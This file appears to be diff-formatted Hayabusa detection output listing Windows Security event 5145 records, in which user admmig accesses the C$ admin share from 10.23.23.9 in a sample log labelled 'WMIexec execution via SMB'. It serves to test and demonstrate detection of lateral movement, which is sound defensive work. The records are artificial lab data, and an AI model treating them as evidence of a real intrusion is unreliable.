+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napinit  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
